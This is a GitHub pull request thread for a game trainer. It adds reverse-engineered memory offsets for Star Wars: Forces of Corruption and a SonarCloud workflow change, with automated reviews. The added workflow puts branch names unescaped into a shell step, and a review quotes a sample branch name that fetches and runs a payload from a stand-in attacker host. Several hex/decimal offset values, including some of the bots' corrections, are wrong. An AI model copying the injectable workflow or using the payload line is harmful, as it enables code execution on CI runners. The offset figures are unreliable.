fix(profiles): apply Phase 2 RE critical corrections#119
Conversation
5 corrections from static decompilation of StarWarsG.exe: 1. Fix hero_respawn_timer fallback offset (0x152070 -> 0xB169F0) RE confirmed Default_Hero_Respawn_Time global at RVA 0xB169F0 2. Add RE-derived fallback offsets for Phase 2 functions/globals: - player_array_global (0xA16FF0), player_count_global (0xA16FF8) - add_credits_func (0x27F370), set_tech_level_func (0x288980) - set_speed_override_func (0x3A8C90), clear_speed_override_func (0x38F8B0) 3. Add 3 new AOB signatures: AddCredits, SetTechLevel, SetSpeedOverride 4. Document HP manipulation as native-hook-only (Set_Hull Lua binding does not exist — confirmed via full Lua binding surface analysis) 5. Document credits/speed path mismatches: current symbols resolve to UI mirrors, not authoritative engine fields. Integration plan in docs/re_integration_plan.md describes the migration path. Promote tactical_god_mode and tactical_one_hit_mode from experimental to stable — RE Phase 1 confirmed the invulnerability mechanism at GameObjectClass+0x3A7. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
|
Unable to trigger custom agent "Code Reviewer". You have run out of credits 😔 |
|
|
Warning Rate limit exceeded
Your organization is not enrolled in usage-based pricing. Contact your admin to enable usage-based pricing to continue reviews beyond the rate limit, or try again in 12 minutes and 8 seconds. ⌛ How to resolve this issue?After the wait time has elapsed, a review can be triggered using the We recommend that you space out your commits to avoid hitting the rate limit. 🚦 How do rate limits work?CodeRabbit enforces hourly rate limits for each developer per organization. Our paid plans have higher rate limits than the trial, open-source and free plans. In all cases, we re-allow further reviews after a brief timeout. Please see our FAQ for further information. ℹ️ Review info⚙️ Run configurationConfiguration used: defaults Review profile: CHILL Plan: Pro Run ID: 📒 Files selected for processing (89)
📝 WalkthroughWalkthroughAdds a planning document for signature-first symbol resolution into the SWFOC Editor, updates the base SWFOC profile with new signatures and fallback offsets plus expanded action descriptions, adds an editor-compatible signature/fallback JSON, and tweaks CI/workflow and dev/test dependency versions. No runtime code changes. Changes
Sequence Diagram(s)sequenceDiagram
participant Editor
participant Scanner as SignatureScanner
participant SymbolMap
participant GhidraPack as GhidraSymbolPack
participant Runtime as GameMemory
Editor->>Scanner: load profile JSON (signatures, fallbacks, actions)
Scanner->>Runtime: perform signature scans / runtime RVA discovery
Scanner-->>SymbolMap: emit resolved symbols & anchors
Editor->>SymbolMap: build action bindings (map signatures -> actions)
Note over Editor,SymbolMap: Optional hydration
Editor->>GhidraPack: request anchor resolution (RVA vs absolute)
GhidraPack-->>Editor: provide resolved symbols, metadata, confidence scores
Editor->>SymbolMap: merge Ghidra anchors (hydrate) / update fallback offsets
Estimated code review effort🎯 4 (Complex) | ⏱️ ~45 minutes Possibly related PRs
Suggested labels
Poem
🚥 Pre-merge checks | ✅ 2 | ❌ 1❌ Failed checks (1 warning)
✅ Passed checks (2 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. ✨ Finishing Touches🧪 Generate unit tests (beta)
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. Comment |
Review Summary by QodoApply Phase 2 RE critical corrections and promote god mode features
WalkthroughsDescription• Fix hero_respawn_timer fallback offset from 0x152070 to 0xB169F0 (critical correction) • Add 8 RE-derived fallback offsets for Phase 2 functions and globals (PlayerArray, AddCredits, SetTechLevel, SetSpeedOverride) • Add 3 new AOB signatures for AddCredits, SetTechLevel, SetSpeedOverride function prologues • Promote tactical_god_mode and tactical_one_hit_mode from experimental to stable features • Document HP/credits/speed path mismatches and native-hook-only constraints in action descriptions • Include comprehensive RE integration plan with feature-by-feature analysis and quick-win ranking Diagramflowchart LR
RE["Phase 2 RE Findings<br/>StarWarsG.exe v1.121.13.7360"]
OFFSET["Offset Corrections<br/>hero_respawn_timer<br/>0x152070 → 0xB169F0"]
FALLBACK["8 New Fallback Offsets<br/>PlayerArray, AddCredits<br/>SetTechLevel, SetSpeedOverride"]
SIGS["3 New AOB Signatures<br/>Function Prologues"]
PROMOTE["Promote Features<br/>god_mode, one_hit_mode<br/>experimental → stable"]
DOCS["Integration Documentation<br/>Mismatches & Migration Paths<br/>re_integration_plan.md"]
PROFILE["Updated base_swfoc.json<br/>Profile Configuration"]
RE --> OFFSET
RE --> FALLBACK
RE --> SIGS
RE --> PROMOTE
RE --> DOCS
OFFSET --> PROFILE
FALLBACK --> PROFILE
SIGS --> PROFILE
PROMOTE --> PROFILE
DOCS -.-> PROFILE
File Changes1. docs/re_integration_plan.md
|
Code Review by Qodo
1. No test evidence for offsets
|
Analysis CompleteGenerated ECC bundle from 1 commits | Confidence: 50% View Pull Request #120Repository Profile
Generated Instincts (14)
After merging, import with: Files
|
 |
|
Overall Grade |
Security Reliability Complexity Hygiene |
Code Review Summary
| Analyzer | Status | Updated (UTC) | Details |
|---|---|---|---|
| Terraform |  |
Apr 4, 2026 12:05a.m. | Review ↗ |
| SQL | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| Rust | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| Shell | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| Ruby | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| PHP | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| Kotlin | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| Swift | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| Scala | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| Python | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| JavaScript | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| Java | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| Go | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| Docker | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| C & C++ | |
Apr 4, 2026 12:05a.m. | Review ↗ |
| Ansible | |
Apr 4, 2026 12:05a.m. | Review ↗ |
![chatgpt-codex-connector[bot]](https://avatars.githubusercontent.com/in/1144995?s=60&v=4){kind=small}
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 14705e6dc1
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| "tactical_one_hit_mode": 1418854, | ||
| "planet_owner": 1523152, | ||
| "hero_respawn_timer": 1384560, | ||
| "hero_respawn_timer": 11495920, |
There was a problem hiding this comment.
Update this fallback to the decimal value that actually matches 0xB169F0. SignatureResolver uses this address when the hero_respawn_timer signature misses, so the current 11495920 (which is 0xAF6B70) points to the wrong location and can make set_hero_respawn_timer write/read an unrelated field. The RE data file added in this same commit already encodes 0xB169F0 as 11626992, which is the value this entry should use.
Useful? React with 👍 / 👎.
Not up to standards ⛔🔴 Issues
|
| Category | Results |
|---|---|
| CodeStyle | 1 minor |
🟢 Metrics 0 complexity · 0 duplication
Metric Results Complexity ✅ 0 (≤ 10 complexity) Duplication ✅ 0 (≤ 0 duplication)
TIP This summary will be updated as you push new changes. Give us feedback
![qodo-code-review[bot]](https://avatars.githubusercontent.com/in/484649?s=60&v=4){kind=small}
| "hero_respawn_timer": 11495920, | ||
| "unit_cap": 2804047, | ||
| "game_speed": 0 | ||
| "game_speed": 0, | ||
| "player_array_global": 10579952, | ||
| "player_count_global": 10579960, | ||
| "default_hero_respawn_time_global": 11495920, | ||
| "add_credits_func": 2618224, | ||
| "set_tech_level_func": 2689408, | ||
| "set_speed_override_func": 3837072, | ||
| "clear_speed_override_func": 3733168 |
There was a problem hiding this comment.
1. No test evidence for offsets 📘 Rule violation ☼ Reliability
This PR changes runtime profile behavior (new signatures and updated fallback offsets) but does not include deterministic test evidence or an explicit, justified testing-skip statement. Without repeatable artifacts, the reliability of the new offsets/signatures cannot be verified independently.
Agent Prompt
## Issue description
Runtime-profile changes (new AOB signatures and fallback offsets) were made without deterministic test evidence and without an explicit, justified statement that testing was skipped.
## Issue Context
This PR modifies live-process symbol resolution inputs (AOB patterns and fallback offsets), which can silently fail or mis-resolve without repeatable validation artifacts.
## Fix Focus Areas
- profiles/default/profiles/base_swfoc.json[66-75]
- TestResults/runs/<newRunId>/repro-bundle.json[1-99999]
- TestResults/runs/<newRunId>/repro-bundle.md[1-99999]
ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools
| "hero_respawn_timer": 11495920, | ||
| "unit_cap": 2804047, | ||
| "game_speed": 0 | ||
| "game_speed": 0, | ||
| "player_array_global": 10579952, | ||
| "player_count_global": 10579960, | ||
| "default_hero_respawn_time_global": 11495920, |
There was a problem hiding this comment.
2. Wrong respawn fallback rva 🐞 Bug ≡ Correctness
The profile sets hero_respawn_timer (and default_hero_respawn_time_global) fallbackOffsets to 11495920 while the PR’s own RE docs/pack state the RVA is 0xB169F0; 0xB169F0 converts to 11626992, so the fallback will resolve the wrong address when signatures miss.
Agent Prompt
### Issue description
`hero_respawn_timer` fallback offset is inconsistent with the stated RVA `0xB169F0` and appears to be the wrong decimal conversion, which will make fallback resolution point to the wrong address.
### Issue Context
Fallback offsets are resolved as `moduleBase + offset` (module-relative RVA). A wrong decimal value will cause incorrect reads/writes for Memory actions like `set_hero_respawn_timer`.
### Fix Focus Areas
- profiles/default/profiles/base_swfoc.json[66-71]
- docs/re_integration_plan.md[67-76]
- profiles/default/sdk/re-knowledge/signatures_phase2_editor_format.json[34-49]
- profiles/default/sdk/re-knowledge/signatures_phase2_editor_format.json[112-115]
### What to change
- Replace `11495920` with the correct decimal value for `0xB169F0` (11626992) everywhere this RVA is represented (profile fallbackOffsets + doc + reference pack), so all sources agree.
ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools
![coderabbitai[bot]](https://avatars.githubusercontent.com/in/347564?s=60&v=4){kind=small}
There was a problem hiding this comment.
Actionable comments posted: 5
🧹 Nitpick comments (1)
profiles/default/profiles/base_swfoc.json (1)
17-20: Removing tactical modes fromexperimentalFeatureshas no runtime effect.The
toggle_tactical_god_modeandtoggle_tactical_one_hit_modeactions are gated byStrictBundleActionsinActionReliabilityService.cs(lines 48-49, checked at line 160), not by theExperimentalFeaturesarray. The profile'sExperimentalFeaturesproperty is merged during profile loading but never read afterwards, making it informational-only.If the intent is to promote these features to "stable," remove them from
StrictBundleActionsinActionReliabilityService.csinstead, or document that theexperimentalFeaturesarray serves only for metadata/documentation purposes.🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@profiles/default/profiles/base_swfoc.json` around lines 17 - 20, The ExperimentalFeatures array in the profile is purely informational and removing entries (e.g., "game_speed", "planet_owner") doesn't change runtime behavior; the actions toggle_tactical_god_mode and toggle_tactical_one_hit_mode are actually gated by the StrictBundleActions collection in ActionReliabilityService (check methods around lines that reference StrictBundleActions and the action checks), so to make those tactical modes truly "stable" remove their action IDs from StrictBundleActions in ActionReliabilityService.cs (or alternatively add documentation noting ExperimentalFeatures is metadata-only); update the StrictBundleActions list to omit "toggle_tactical_god_mode" and "toggle_tactical_one_hit_mode" if you want runtime enabling.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@docs/re_integration_plan.md`:
- Around line 161-170: The quick-win table's hero_respawn_timer fallback has the
wrong decimal conversion: replace the incorrect decimal value `11495920` in the
table and any related profile JSON example with the correct decimal equivalent
for 0xB169F0, which is `11626992`; update the entry labelled "Fix
hero_respawn_timer fallback" and any references to the hex/decimal pair so the
table and profile JSON consistently use `0xB169F0` -> `11626992`.
- Around line 69-76: The documentation and JSON signature file contain an
incorrect decimal conversion for 0xB169F0; update the decimal value from
11495920 to the correct 11626992 wherever referenced (e.g., in the
hero_respawn_timer doc text, the Default_Hero_Respawn_Time global description
and the signatures_phase2_editor_format.json fallback offset entry), then re-run
any AOB validation (ScheduleHeroRespawn/AOB pattern) to ensure the pattern still
matches after the corrected numeric value.
In `@profiles/default/profiles/base_swfoc.json`:
- Line 75: Update the two mismatched function offsets in the base profile JSON:
change clear_speed_override_func from 3733168 to 3733680 and set_tech_level_func
from 2689408 to 2656640 so they match the authoritative values in
signatures_phase2_editor_format.json; locate the keys clear_speed_override_func
and set_tech_level_func in the base_swfoc profile and replace their numeric
values accordingly.
In `@profiles/default/sdk/re-knowledge/signatures_phase2_editor_format.json`:
- Around line 34-43: The fallback offset for set_tech_level_func is inconsistent
between configs; update the value in base_swfoc.json (the entry named
"set_tech_level_func") from 2689408 to 2656640 so it matches
signatures_phase2_editor_format.json and the RE integration plan’s RVA for
SetTechLevel; locate the "set_tech_level_func" key in base_swfoc.json and
replace the numeric offset with 2656640.
- Around line 112-115: The Decimal/Hex mismatch for Default_Hero_Respawn_Time
needs correction: verify the authoritative RE finding and then make consistent
updates—if the RVA 0xB169F0 is correct, change the decimal value to 11626992 and
update the corresponding entries hero_respawn_timer and
default_hero_respawn_time_global in base_swfoc.json to that same decimal; if the
decimal 11495920 is correct, change the rva to 0xAF6DF0 and likewise update
hero_respawn_timer and default_hero_respawn_time_global to 11495920 so all three
references (rva in signatures_phase2_editor_format.json and the two parameters
in base_swfoc.json) match the verified value.
---
Nitpick comments:
In `@profiles/default/profiles/base_swfoc.json`:
- Around line 17-20: The ExperimentalFeatures array in the profile is purely
informational and removing entries (e.g., "game_speed", "planet_owner") doesn't
change runtime behavior; the actions toggle_tactical_god_mode and
toggle_tactical_one_hit_mode are actually gated by the StrictBundleActions
collection in ActionReliabilityService (check methods around lines that
reference StrictBundleActions and the action checks), so to make those tactical
modes truly "stable" remove their action IDs from StrictBundleActions in
ActionReliabilityService.cs (or alternatively add documentation noting
ExperimentalFeatures is metadata-only); update the StrictBundleActions list to
omit "toggle_tactical_god_mode" and "toggle_tactical_one_hit_mode" if you want
runtime enabling.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: defaults
Review profile: CHILL
Plan: Pro
Run ID: 17ab99c3-cf7f-42a3-b3c0-463cbca4890a
📒 Files selected for processing (3)
docs/re_integration_plan.mdprofiles/default/profiles/base_swfoc.jsonprofiles/default/sdk/re-knowledge/signatures_phase2_editor_format.json
| **Current state:** Has signature `hero_respawn_timer` with AOB, fallback offset `1384560` (0x152070). | ||
|
|
||
| **RE finding:** `Default_Hero_Respawn_Time` global at RVA `0xB169F0` (11495920 decimal). The `ScheduleHeroRespawn` function reads this when delay<=0. | ||
|
|
||
| **Mismatch:** Fallback offset `0x152070` does NOT match RE finding `0xB169F0`. **The current offset appears wrong.** Needs validation. | ||
|
|
||
| **Recommendation:** Update fallback offset to `11495920` (0xB169F0). Verify AOB pattern still matches. | ||
|
|
There was a problem hiding this comment.
Hex-to-decimal conversion error in documentation.
Line 71 states 0xB169F0 equals 11495920 decimal, but 0xB169F0 actually equals 11626992. This is the same error present in signatures_phase2_editor_format.json. Correct the decimal value to maintain consistency.
📝 Proposed fix
-**RE finding:** `Default_Hero_Respawn_Time` global at RVA `0xB169F0` (11495920 decimal). The `ScheduleHeroRespawn` function reads this when delay<=0.
+**RE finding:** `Default_Hero_Respawn_Time` global at RVA `0xB169F0` (11626992 decimal). The `ScheduleHeroRespawn` function reads this when delay<=0.🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@docs/re_integration_plan.md` around lines 69 - 76, The documentation and JSON
signature file contain an incorrect decimal conversion for 0xB169F0; update the
decimal value from 11495920 to the correct 11626992 wherever referenced (e.g.,
in the hero_respawn_timer doc text, the Default_Hero_Respawn_Time global
description and the signatures_phase2_editor_format.json fallback offset entry),
then re-run any AOB validation (ScheduleHeroRespawn/AOB pattern) to ensure the
pattern still matches after the corrected numeric value.
| | Rank | Change | Effort | Impact | What to Do | | ||
| |------|--------|--------|--------|------------| | ||
| | 1 | Fix hero_respawn_timer fallback | 5 min | High | Change `1384560` to `11495920` in profile JSON | | ||
| | 2 | Promote god_mode/one_hit from experimental | 5 min | Medium | Remove from `experimentalFeatures` in profile JSON | | ||
| | 3 | Add tech_level signature + fallback | 30 min | High | New signature entry + new action in profile JSON | | ||
| | 4 | Add credits_authoritative action | 1 hr | High | New action using PlayerArray pointer chain | | ||
| | 5 | Add speed_override action | 1 hr | High | New action using locomotor pointer chain | | ||
| | 6 | Add max_credits action | 30 min | Medium | PlayerObject+0x74 float write (same chain as credits) | | ||
| | 7 | Add income_multiplier action | 1 hr | Medium | New signature + float write | | ||
| | 8 | Generate Ghidra Symbol Pack | 30 min | High | Convert all known RVAs to GhidraAnchorDto format | |
There was a problem hiding this comment.
Quick-win table uses incorrect decimal value.
If 0xB169F0 is the correct RVA (as stated throughout the document), the target value in row 1 should be 11626992, not 11495920. Align this with the corrected hex-to-decimal conversion.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@docs/re_integration_plan.md` around lines 161 - 170, The quick-win table's
hero_respawn_timer fallback has the wrong decimal conversion: replace the
incorrect decimal value `11495920` in the table and any related profile JSON
example with the correct decimal equivalent for 0xB169F0, which is `11626992`;
update the entry labelled "Fix hero_respawn_timer fallback" and any references
to the hex/decimal pair so the table and profile JSON consistently use
`0xB169F0` -> `11626992`.
| "add_credits_func": 2618224, | ||
| "set_tech_level_func": 2689408, | ||
| "set_speed_override_func": 3837072, | ||
| "clear_speed_override_func": 3733168 |
There was a problem hiding this comment.
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash
# Compare clear_speed_override_func values between files
echo "=== base_swfoc.json ==="
grep "clear_speed_override_func" profiles/default/profiles/base_swfoc.json
echo ""
echo "=== signatures_phase2_editor_format.json ==="
grep "clear_speed_override_func" profiles/default/sdk/re-knowledge/signatures_phase2_editor_format.jsonRepository: Prekzursil/SWFOC-Mod-Menu
Length of output: 221
🏁 Script executed:
#!/bin/bash
# Check file sizes and structure
echo "=== File details ==="
ls -lh profiles/default/profiles/base_swfoc.json profiles/default/sdk/re-knowledge/signatures_phase2_editor_format.json
# Check if there's any context around the offset in the files
echo ""
echo "=== Context around clear_speed_override_func in base_swfoc.json ==="
grep -B 2 -A 2 "clear_speed_override_func" profiles/default/profiles/base_swfoc.json
echo ""
echo "=== Context around clear_speed_override_func in signatures_phase2_editor_format.json ==="
grep -B 2 -A 2 "clear_speed_override_func" profiles/default/sdk/re-knowledge/signatures_phase2_editor_format.json
# Check if there's any README or documentation
echo ""
echo "=== Looking for documentation files ==="
find profiles/default -name "*.md" -o -name "README*" | head -10Repository: Prekzursil/SWFOC-Mod-Menu
Length of output: 949
🏁 Script executed:
#!/bin/bash
# Check git history for these files to understand when values changed
echo "=== Recent commits for base_swfoc.json ==="
git log --oneline -10 -- profiles/default/profiles/base_swfoc.json 2>/dev/null || echo "Git history not available"
echo ""
echo "=== Recent commits for signatures_phase2_editor_format.json ==="
git log --oneline -10 -- profiles/default/sdk/re-knowledge/signatures_phase2_editor_format.json 2>/dev/null || echo "Git history not available"
# Check if there are other references to these offset values
echo ""
echo "=== Search for 3733168 (base_swfoc value) ==="
rg "3733168" --type json
echo ""
echo "=== Search for 3733680 (signatures value) ==="
rg "3733680" --type jsonRepository: Prekzursil/SWFOC-Mod-Menu
Length of output: 588
Multiple function offset inconsistencies between profile files.
clear_speed_override_func has mismatched values: 3733168 in base_swfoc.json vs 3733680 in signatures_phase2_editor_format.json. Additionally, set_tech_level_func differs (2689408 vs 2656640). Both files were updated in the same Phase 2 RE corrections commit but were not properly synchronized. Update base_swfoc.json to match the offsets from signatures_phase2_editor_format.json, which appears to be the authoritative RE reference.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@profiles/default/profiles/base_swfoc.json` at line 75, Update the two
mismatched function offsets in the base profile JSON: change
clear_speed_override_func from 3733168 to 3733680 and set_tech_level_func from
2689408 to 2656640 so they match the authoritative values in
signatures_phase2_editor_format.json; locate the keys clear_speed_override_func
and set_tech_level_func in the base_swfoc profile and replace their numeric
values accordingly.
| "new_fallback_offsets": { | ||
| "add_credits_func": 2618224, | ||
| "set_tech_level_func": 2656640, | ||
| "set_speed_override_func": 3837072, | ||
| "clear_speed_override_func": 3733680, | ||
| "schedule_hero_respawn_func": 4778768, | ||
| "player_array_global": 10579952, | ||
| "player_count_global": 10579960, | ||
| "default_hero_respawn_time": 11626992 | ||
| }, |
There was a problem hiding this comment.
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash
# Verify the set_tech_level_func offset values in both files
echo "=== signatures_phase2_editor_format.json ==="
cat profiles/default/sdk/re-knowledge/signatures_phase2_editor_format.json | grep -A1 "set_tech_level_func"
echo ""
echo "=== base_swfoc.json ==="
cat profiles/default/profiles/base_swfoc.json | grep "set_tech_level_func"
echo ""
echo "=== RE integration plan reference ==="
grep -i "SetTechLevel" docs/re_integration_plan.md | head -5Repository: Prekzursil/SWFOC-Mod-Menu
Length of output: 1001
Align set_tech_level_func fallback offset in base_swfoc.json.
signatures_phase2_editor_format.json line 37 specifies set_tech_level_func: 2656640 (0x288980), which matches the RE integration plan's documented RVA for SetTechLevel. However, base_swfoc.json line 73 uses a different value: 2689408 (0x290D80). Update base_swfoc.json to use 2656640 to align with the authoritative RE plan reference and the other configuration file.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@profiles/default/sdk/re-knowledge/signatures_phase2_editor_format.json`
around lines 34 - 43, The fallback offset for set_tech_level_func is
inconsistent between configs; update the value in base_swfoc.json (the entry
named "set_tech_level_func") from 2689408 to 2656640 so it matches
signatures_phase2_editor_format.json and the RE integration plan’s RVA for
SetTechLevel; locate the "set_tech_level_func" key in base_swfoc.json and
replace the numeric offset with 2656640.
| "Default_Hero_Respawn_Time": { | ||
| "rva": "0xB169F0", | ||
| "decimal": 11495920 | ||
| } |
There was a problem hiding this comment.
Hex-to-decimal mismatch in Default_Hero_Respawn_Time reference.
The rva field shows 0xB169F0 but the decimal field shows 11495920. These don't match:
0xB169F0= 11626992 (not 11495920)11495920=0xAF6DF0(not 0xB169F0)
This inconsistency propagates to base_swfoc.json which uses 11495920 for both hero_respawn_timer and default_hero_respawn_time_global. One of these values is incorrect—verify against the RE findings which value is authoritative.
🐛 If 0xB169F0 is correct, fix the decimal value
"Default_Hero_Respawn_Time": {
"rva": "0xB169F0",
- "decimal": 11495920
+ "decimal": 11626992
}And correspondingly update base_swfoc.json:
- "hero_respawn_timer": 11495920,
+ "hero_respawn_timer": 11626992,
...
- "default_hero_respawn_time_global": 11495920,
+ "default_hero_respawn_time_global": 11626992,📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| "Default_Hero_Respawn_Time": { | |
| "rva": "0xB169F0", | |
| "decimal": 11495920 | |
| } | |
| "Default_Hero_Respawn_Time": { | |
| "rva": "0xB169F0", | |
| "decimal": 11626992 | |
| } |
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@profiles/default/sdk/re-knowledge/signatures_phase2_editor_format.json`
around lines 112 - 115, The Decimal/Hex mismatch for Default_Hero_Respawn_Time
needs correction: verify the authoritative RE finding and then make consistent
updates—if the RVA 0xB169F0 is correct, change the decimal value to 11626992 and
update the corresponding entries hero_respawn_timer and
default_hero_respawn_time_global in base_swfoc.json to that same decimal; if the
decimal 11495920 is correct, change the rva to 0xAF6DF0 and likewise update
hero_respawn_timer and default_hero_respawn_time_global to 11495920 so all three
references (rva in signatures_phase2_editor_format.json and the two parameters
in base_swfoc.json) match the verified value.
…rity alerts 1. Upgrade coverlet from 6.0.4 to 6.0.5 — fixes "Unable to read beyond the end of the stream" crash in coverage calculation that was blocking the Coverage 100 Gate on Windows runners 2. Fix SonarCloud workflow to pass PR parameters (pullrequest.key, pullrequest.branch, pullrequest.base) so SonarCloud associates analysis with the correct PR instead of returning 404 3. Fix 3 high-severity npm vulnerabilities in tools/visual-chromatic: - lodash Code Injection via _.template (GHSA-r5fr-rjxr-66jc) - lodash Prototype Pollution (GHSA-f23m-r3pf-42rh) - Storybook WebSocket Hijacking (GHSA-mjf5-7g4m-gx5w) - Storybook env var exposure (GHSA-8452-54wp-rmv6) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
|
Analysis CompleteGenerated ECC bundle from 2 commits | Confidence: 50% View Pull Request #121Repository Profile
Generated Instincts (14)
After merging, import with: Files
|
![github-advanced-security[bot]](https://avatars.githubusercontent.com/in/57789?s=60&v=4){kind=small}
| /d:sonar.host.url="https://sonarcloud.io" | ||
| SONAR_ARGS="/k:Prekzursil_SWFOC-Mod-Menu /o:prekzursil /d:sonar.token=$SONAR_TOKEN /d:sonar.host.url=https://sonarcloud.io" | ||
| if [ "${{ github.event_name }}" = "pull_request" ]; then | ||
| SONAR_ARGS="$SONAR_ARGS /d:sonar.pullrequest.key=${{ github.event.pull_request.number }} /d:sonar.pullrequest.branch=${{ github.head_ref }} /d:sonar.pullrequest.base=${{ github.base_ref }}" |
Check failure
Code scanning / SonarCloud
GitHub Actions should not be vulnerable to script injections High
There was a problem hiding this comment.
Actionable comments posted: 1
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/sonarcloud.yml:
- Around line 51-55: The workflow is vulnerable because github.head_ref and
github.base_ref are interpolated directly into SONAR_ARGS, enabling command
injection; fix by moving those PR values into GitHub Actions environment
variables (e.g., set env entries like PR_HEAD and PR_BASE using ${{
github.head_ref }} and ${{ github.base_ref }}), then append them to SONAR_ARGS
using the env variable names (not direct `${{ }}`) so the shell only sees safe,
escaped values; update the SONAR_ARGS construction and the dotnet-sonarscanner
begin invocation to reference the env vars (e.g.,
/d:sonar.pullrequest.branch=$PR_HEAD /d:sonar.pullrequest.base=$PR_BASE) and
ensure arguments are quoted to avoid word-splitting.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: defaults
Review profile: CHILL
Plan: Pro
Run ID: 6b4d6b55-b2d8-49fa-98bd-fa269b65d13e
⛔ Files ignored due to path filters (1)
tools/visual-chromatic/package-lock.jsonis excluded by!**/package-lock.json
📒 Files selected for processing (3)
.github/workflows/sonarcloud.ymltests/SwfocTrainer.Tests/SwfocTrainer.Tests.csprojtools/visual-chromatic/package.json
✅ Files skipped from review due to trivial changes (2)
- tools/visual-chromatic/package.json
- tests/SwfocTrainer.Tests/SwfocTrainer.Tests.csproj
| SONAR_ARGS="/k:Prekzursil_SWFOC-Mod-Menu /o:prekzursil /d:sonar.token=$SONAR_TOKEN /d:sonar.host.url=https://sonarcloud.io" | ||
| if [ "${{ github.event_name }}" = "pull_request" ]; then | ||
| SONAR_ARGS="$SONAR_ARGS /d:sonar.pullrequest.key=${{ github.event.pull_request.number }} /d:sonar.pullrequest.branch=${{ github.head_ref }} /d:sonar.pullrequest.base=${{ github.base_ref }}" | ||
| fi | ||
| dotnet-sonarscanner begin $SONAR_ARGS |
There was a problem hiding this comment.
Script injection vulnerability via user-controlled branch names.
github.head_ref and github.base_ref are attacker-controlled values (anyone can open a PR from a maliciously-named branch like $(curl attacker.com/payload|sh)). Interpolating them directly into the run block allows arbitrary command execution.
Pass these values through environment variables instead, which GitHub Actions automatically escapes:
🔒 Proposed fix using environment variables
env:
SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
+ PR_NUMBER: ${{ github.event.pull_request.number }}
+ PR_HEAD_REF: ${{ github.head_ref }}
+ PR_BASE_REF: ${{ github.base_ref }}
+ EVENT_NAME: ${{ github.event_name }}
run: |
- SONAR_ARGS="/k:Prekzursil_SWFOC-Mod-Menu /o:prekzursil /d:sonar.token=$SONAR_TOKEN /d:sonar.host.url=https://sonarcloud.io"
- if [ "${{ github.event_name }}" = "pull_request" ]; then
- SONAR_ARGS="$SONAR_ARGS /d:sonar.pullrequest.key=${{ github.event.pull_request.number }} /d:sonar.pullrequest.branch=${{ github.head_ref }} /d:sonar.pullrequest.base=${{ github.base_ref }}"
+ SONAR_ARGS="/k:Prekzursil_SWFOC-Mod-Menu /o:prekzursil /d:sonar.token=$SONAR_TOKEN /d:sonar.host.url=https://sonarcloud.io"
+ if [ "$EVENT_NAME" = "pull_request" ]; then
+ SONAR_ARGS="$SONAR_ARGS /d:sonar.pullrequest.key=$PR_NUMBER /d:sonar.pullrequest.branch=$PR_HEAD_REF /d:sonar.pullrequest.base=$PR_BASE_REF"
fi
dotnet-sonarscanner begin $SONAR_ARGS🧰 Tools
🪛 GitHub Check: SonarCloud
[failure] 53-53: GitHub Actions should not be vulnerable to script injections
The expression github.head_ref can be set by an external actor to a specially crafted value, enabling script injection. Change this workflow to not use user-controlled data directly in a run block, for example by assigning this expression to an environment variable.See more on SonarQube Cloud
🪛 GitHub Check: SonarCloud Code Analysis
[failure] 53-53: The expression github.head_ref can be set by an external actor to a specially crafted value, enabling script injection. Change this workflow to not use user-controlled data directly in a run block, for example by assigning this expression to an environment variable.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/sonarcloud.yml around lines 51 - 55, The workflow is
vulnerable because github.head_ref and github.base_ref are interpolated directly
into SONAR_ARGS, enabling command injection; fix by moving those PR values into
GitHub Actions environment variables (e.g., set env entries like PR_HEAD and
PR_BASE using ${{ github.head_ref }} and ${{ github.base_ref }}), then append
them to SONAR_ARGS using the env variable names (not direct `${{ }}`) so the
shell only sees safe, escaped values; update the SONAR_ARGS construction and the
dotnet-sonarscanner begin invocation to reference the env vars (e.g.,
/d:sonar.pullrequest.branch=$PR_HEAD /d:sonar.pullrequest.base=$PR_BASE) and
